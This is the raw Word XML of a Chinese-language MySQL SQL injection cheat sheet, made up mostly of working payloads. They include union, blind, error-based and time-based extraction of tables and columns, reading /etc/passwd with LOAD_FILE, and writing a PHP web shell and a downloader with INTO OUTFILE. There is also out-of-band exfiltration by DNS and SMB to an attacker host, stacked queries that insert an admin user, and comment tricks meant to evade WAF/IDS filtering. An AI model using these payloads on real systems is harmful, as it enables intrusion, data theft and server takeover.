                <w:u w:val="singl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如果知道要查找的表名，并且启用了错误显示，则可以使用此方法。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它将返回表中的列数，而不是查询。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0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例子</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849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bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="8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 w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>给定查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial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SELECT permission FROM Users WHERE id = {INJECTION POINT};</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/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  <w:tbl>
            <w:tblPr>
              <w:tblW w:w="8280" w:type="dxa"/>
              <w:tblInd w:w="-6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140"/>
              <w:gridCol w:w="41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77" w:hRule="atLeast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Courier" w:hAnsi="Courier" w:cs="Courier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 AND (SELECT * FROM Users) = 1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操作数应该包含3列</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/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2、检索表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Style w:val="5"/>
        <w:tblW w:w="8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7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85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Union</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="760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UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;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85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Blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="760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AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables &gt; 'A'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24" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="760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tbl>
            <w:tblPr>
              <w:tblW w:w="7500" w:type="dxa"/>
              <w:tblInd w:w="-6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5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310" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))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54" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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(@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);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54" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));-- Available in 5.1.5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ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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注释：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"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3F3F7"/>
        </w:rPr>
        <w:t>version=10 for MySQL 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ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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3、检索列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Style w:val="5"/>
        <w:tblW w:w="87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7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85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Union</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792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 xml:space="preserve">UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns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WHERE table_name = 'tablename'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85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Blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792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AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns &gt; 'A'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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792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tbl>
            <w:tblPr>
              <w:tblW w:w="7760" w:type="dxa"/>
              <w:tblInd w:w="-6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7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320" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))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61" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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(@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0);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61" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5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61" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1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61" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)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61" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7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AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING (SOME_EXISTING_COLUMN)) a)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955" w:tblpY="226"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8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8"/>
        <w:gridCol w:w="7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</w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8288" w:type="dxa"/>
            <w:gridSpan w:val="2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  <w:r>
              <w:rPr>
                <w:rStyle w:val="8"/>
                <w:rFonts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26"/>
                <w:szCs w:val="26"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>PROCEDURE ANALYSE()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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="765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left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bookmarkStart w:id="1" w:name="OLE_LINK4"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="8"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="222222"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>PROCEDURE ANALYSE()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注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="765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24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="singl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4"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>web应用程序需要在注入的SQL查询中显示选中的列之一。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79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例子</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="765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bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace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例子：给定查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace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SELECT username, permission FROM Users WHERE id = 1;</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="5"/>
              <w:tblW w:w="658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19"/>
              <w:gridCol w:w="286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</w:tblPrEx>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="37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 PROCEDURE ANALYSE()</w:t>
                  </w:r>
                </w:p>
              </w:tc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获取第一列的名称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7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 LIMIT 1,1 PROCEDURE ANALYSE()</w:t>
                  </w:r>
                </w:p>
              </w:tc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获取第二列的名称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7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Courier" w:hAnsi="Courier" w:cs="Courier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urier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                      <w:i w:val="0"/>
                      <w:caps w:val="0"/>
                      <w:color w:val="22222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1 LIMIT 2,1 PROCEDURE ANALYSE()</w:t>
                  </w:r>
                </w:p>
              </w:tc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right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:textAlignment w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:i w:val="0"/>
                      <w:caps w:val="0"/>
                      <w:color w:val="222222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E3033"/>
                      <w:spacing w:val="0"/>
                      <w:sz w:val="21"/>
                      <w:szCs w:val="21"/>
                      <w:shd w:val="clear" w:fill="FFFFFF"/>
                    </w:rPr>
                    <w:t>获取第三列的名称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4、检索多个表/列一次</w:t>
      </w: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(@) FROM (SELECT(@:=0x00),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(SELECT (@) FROM (information_schema.columns) WHERE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(table_schema&gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] &gt;',table_name,' &gt; ',column_name))))x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例子1：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* FROM Users WHERE id = '-1' UNION SELECT 1, 2,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(SELECT (@) FROM (SELECT(@:=0x00),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(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] &gt;',table_name,' &gt; ',column_name))))x)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 4--+';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 information_schema ] &gt;CHARACTER_SETS &gt; CHARACTER_SET_NAME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 information_schema ] &gt;CHARACTER_SETS &gt; DEFAULT_COLLATE_NAME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 information_schema ] &gt;CHARACTER_SETS &gt; DESCRIPTION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 information_schema ] &gt;CHARACTER_SETS &gt; MAXLEN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 information_schema ] &gt;COLLATIONS &gt; COLLATION_NAME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 information_schema ] &gt;COLLATIONS &gt; CHARACTER_SET_NAME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 information_schema ] &gt;COLLATIONS &gt; ID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 information_schema ] &gt;COLLATIONS &gt; IS_DEFAULT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 information_schema ] &gt;COLLATIONS &gt; IS_COMPILED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例子2：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username FROM Users WHERE id = '-1' UNION SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New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MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns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--+';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输出：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bookmarkStart w:id="2" w:name="OLE_LINK2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表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK3"/>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>talk_revisions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/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列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>: revid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表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>: talk_revisions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列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: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户名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表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>: talk_revisions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列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: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用户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表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>: talk_projects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列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: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优先级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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5、从列名中查找表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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61"/>
        <w:gridCol w:w="2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6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table_name FROM information_schema.columns WHERE column_name = 'username';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259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查找名为username的任何列的表名。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86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table_name FROM information_schema.columns WHERE column_name LIKE '%user%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259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查找包含单词user的任何列的表名。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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6、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从表名中查找列</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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11"/>
        <w:gridCol w:w="2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1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column_name FROM information_schema.columns WHERE table_name = 'Users';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="254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查找Users表的列。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1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column_name FROM information_schema.columns WHERE table_name LIKE '%user%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="254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查找包含单词user的任何表的列名。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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7、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查找当前查询</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="84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64"/>
        <w:gridCol w:w="3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5264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info FROM information_schema.processlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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从MySQL 5.1.7开始可用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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十、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避免使用引文</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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3"/>
        <w:gridCol w:w="1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Users WHERE username = 0x61646D696E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="157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十六进制编码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Users WHERE username = CHAR(97, 100, 109, 105, 110)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="157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CHAR()函数。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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十一、字符串连接</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="50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1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'a' 'd' 'mi' 'n';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1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CONCAT('a', 'd', 'm', 'i', 'n');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1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CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');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1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GROUP_CONCAT('a', 'd', 'm', 'i', 'n');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注释：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如果CONCAT()的任何参数为空，则返回NULL。而不是使用CONCAT_WS ()。CONCAT_WS()的第一个参数为其其余参数定义分隔符。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十二、条件语句</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2542" w:tblpY="21"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="10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IF()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IFNULL()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NULLIF()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Arial" w:hAnsi="Arial" w:eastAsia="monospace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SELECT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IF(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1=1, true, false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)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 w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"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SELECT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CASE WHEN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 1=1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THEN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 true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ELSE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 false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END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Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial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Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial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Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial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Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial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eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace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monospace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时序</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2542" w:tblpY="101"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="22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9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SLEEP()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="96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MySQL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3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BENCHMARK()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="96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MySQL 4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial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 - (IF(MID(version(),1,1) LIKE 5,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BENCHMARK(100000,SHA1('true'))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 false)) - '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权限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文件权限</w:t>
      </w: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以下查询可以帮助确定给定用户的文件特权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tbl>
      <w:tblPr>
        <w:tblW w:w="8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1"/>
        <w:gridCol w:w="692"/>
        <w:gridCol w:w="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6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file_priv FROM mysql.user WHERE user = 'username';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="692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根权限要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="60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MySQL 4/5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6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grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="692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不需要权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="603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MySQL 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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文件读取</w:t>
      </w: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如果用户具有文件特权，则可以读取文件。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1955" w:tblpY="226"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8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8"/>
        <w:gridCol w:w="7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</w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8288" w:type="dxa"/>
            <w:gridSpan w:val="2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30" w:right="30" w:hanging="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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  <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i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  <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>LOAD_FILE()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例子</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="765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30" w:right="30" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
              </w:rPr>
            </w:pP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SELECT </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="CC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LOAD_FILE(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'/etc/passwd'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="CC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30" w:right="30" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
              </w:rPr>
            </w:pP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SELECT </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="CC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LOAD_FILE(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0x2F6574632F706173737764</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="CC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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="765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Style w:val="8"/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文件必须位于服务器主机上。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LOAD_FILE()的基目录是@@datadir。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该文件必须是MySQL用户可读的。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文件大小必须小于max_allowed_packet。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@@max_allowed_packet的默认大小为1047552字节。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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写文件</w:t>
      </w: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如果用户具有文件特权，可以创建文件。</w:t>
      </w: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例子：</w:t>
      </w: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要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编写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PHP shell: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'&lt;? system($_GET[\'c\']); ?&gt;'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INTO OUTFILE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'/var/www/shell.php';</w:t>
      </w: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然后访问：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"http://localhost/shell.php?c=cat%20/etc/passwd" </w:instrTex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ourier" w:hAnsi="Courier" w:cs="Courier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http://localhost/shell.php?c=cat%20/etc/passwd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要编写下载程序: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SELECT '&lt;?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri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fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?&gt;'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libri" w:hAnsi="Calibri" w:cs="Calibri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INTO OUTFILE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'/var/www/get.php'</w:t>
      </w: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然后访问：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"http://localhost/get.php?f=shell.php&amp;u=http:/localhost/c99.txt" </w:instrTex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ourier" w:hAnsi="Courier" w:cs="Courier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http://localhost/get.php?f=shell.php&amp;u=http://localhost/c99.txt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="720" w:leftChars="0" w:hanging="720" w:hangingChars="30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注释：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文件不能用INTO OUTFILE覆盖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INTO OUTFILE必须是查询中的最后一条语句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没有方法对路径名进行编码，因此需要引号。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569" w:firstLineChars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十七、带外信道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="569" w:firstLineChars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1、DNS请求</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1792" w:tblpY="528"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8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56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LOAD_FILE(CONCAT('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\'));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ind w:firstLine="569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SMB请求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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="62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1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 OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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十八、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堆叠查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0" w:firstLine="480" w:firstLineChars="20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使用MySQL可以进行堆叠查询，这取决于PHP应用程序使用哪个驱动程序与数据库通信。PDO_MYSQL驱动程序支持堆栈查询。MySQLi(改进的扩展)驱动程序还通过multi_query()函数支持堆栈查询。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0" w:firstLine="480" w:firstLineChars="20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例子：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* FROM Users WHERE ID=1 AND 1=0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INSERT INTO Users(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin');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* FROM Users WHERE ID=1 AND 1=0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SHOW COLUMNS FROM Users;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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十九、MySQL代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="480" w:firstLineChars="20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MySQL允许在感叹号后面指定版本号。只有当版本大于或等于指定的版本号时，才会执行注释中的语法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="480" w:firstLineChars="20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例子：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UNION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 </w:t>
      </w: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/*!50000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5,null;%00</w:t>
      </w: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*//*!40000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4,null-- ,</w:t>
      </w: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*//*!30000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3,null-- x</w:t>
      </w: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*/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0,null--+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 1</w:t>
      </w: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/*!41320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UNION</w:t>
      </w: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/*!/*!/*!00000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/*!/*!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USER</w:t>
      </w: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/*!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Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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/*!/*!/*!*/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7F8F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注释：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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7F8FA"/>
        </w:rPr>
        <w:t>第一个示例返回版本;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7F8FA"/>
        </w:rPr>
        <w:t>它使用一个包含2列的UNION。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720" w:firstLineChars="3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第二个示例演示了这对于绕过WAF/IDS是多么有用。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二十、模糊测试与混淆</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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允许中介角色</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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bidi w:val="0"/>
        <w:jc w:val="left"/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以下字符可以用作空格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tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2505" w:tblpY="193"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="3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2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0A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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0B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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纵向制表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0C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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新页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0D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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回车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A0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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插入空格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255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空格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%0A%09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UNION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%0C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%A0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%20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%23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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括号也可以用来避免使用空格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：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2520" w:tblpY="125"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="34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"/>
        <w:gridCol w:w="2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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="258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29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="258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</w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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UNION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column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FROM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table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允许在AND/OR之后使用中间字符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W w:w="3435" w:type="dxa"/>
        <w:tblInd w:w="6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2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56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2B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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2D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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7E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
